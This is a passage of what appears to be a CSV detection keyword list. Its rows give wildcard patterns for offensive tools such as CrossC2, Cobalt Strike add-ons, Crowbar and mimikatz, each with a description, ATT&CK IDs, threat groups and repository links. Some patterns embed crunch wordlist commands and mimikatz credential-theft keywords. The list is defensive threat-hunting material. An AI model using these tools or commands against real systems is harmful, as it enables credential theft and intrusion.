T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*crossc2_entry*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*crossc2_portscan.*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*crossc2_serverscan.*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*CrossC2Beacon*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2-cs*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2-GithubBot*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2Kit,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2Kit.*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*CrossC2Kit.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z 
-*CrossC2Kit.git*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*CrossC2Kit_demo*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*crossc2kit_latest*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2Kit_Loader*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. 
CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*CrossC2Listener*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2MemScriptEng*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*CrossC2Script*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossLinked*,offensive_tool_keyword,CrossLinked,CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. 
Using similar search engine scraping capabilities found in tools like subscraper and pymeta,T1596 - T1593 - T1591 - T1589 - T1556 - T1213,TA0043 - TA0010 - TA0009,N/A,N/A,Information Gathering,https://github.com/m8r0wn/CrossLinked,1,0,N/A,N/A,10,915,155,2023-10-03T13:00:54Z,2019-05-16T13:36:36Z -*CrossNet.exe*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*Cross-Site-Scripting-XSS-Payloads*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*CrossTenantSynchronizationBackdoor.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & 
effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*crowbar*,offensive_tool_keyword,Crowbar,Crowbar (formally known as Levye) is a brute forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example. while most brute forcing tools use username and password for SSH brute force. Crowbar uses SSH key(s). This allows for any private keys that have been obtained during penetration tests. to be used to attack other SSH servers.,T1110 - T1114 - T1189 - T1051 - T1552,TA0002 - TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/galkan/crowbar,1,0,N/A,N/A,10,1231,324,2022-12-28T16:10:59Z,2014-09-30T07:46:23Z -*CroweCybersecurity/ad-ldap-enum*,offensive_tool_keyword,ad-ldap-enum,An LDAP based Active Directory user and group enumeration tool,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/CroweCybersecurity/ad-ldap-enum,1,1,N/A,6,3,290,72,2023-02-10T19:07:34Z,2015-08-25T19:38:39Z -*CRTInjectAsSystem*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*CRTInjectElevated*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*CRTInjectWithoutPid*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*crunch * -o *.txt*,offensive_tool_keyword,crunch,Generate a dictionary file containing words with a minimum and maximum length,T1596 - T1596.001,TA0043,N/A,N/A,Credential Access,https://sourceforge.net/projects/crunch-wordlist/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*crunch 4 7 abcdefghijklmnopqrstuvwxyz1234567890 -o wordlist.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*crypt0p3g/bof-collection*,offensive_tool_keyword,bof-collection,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/crypt0p3g/bof-collection,1,1,N/A,N/A,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z 
-*crypto::capi*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::certificates*,offensive_tool_keyword,mimikatz,Mimikatz keywords 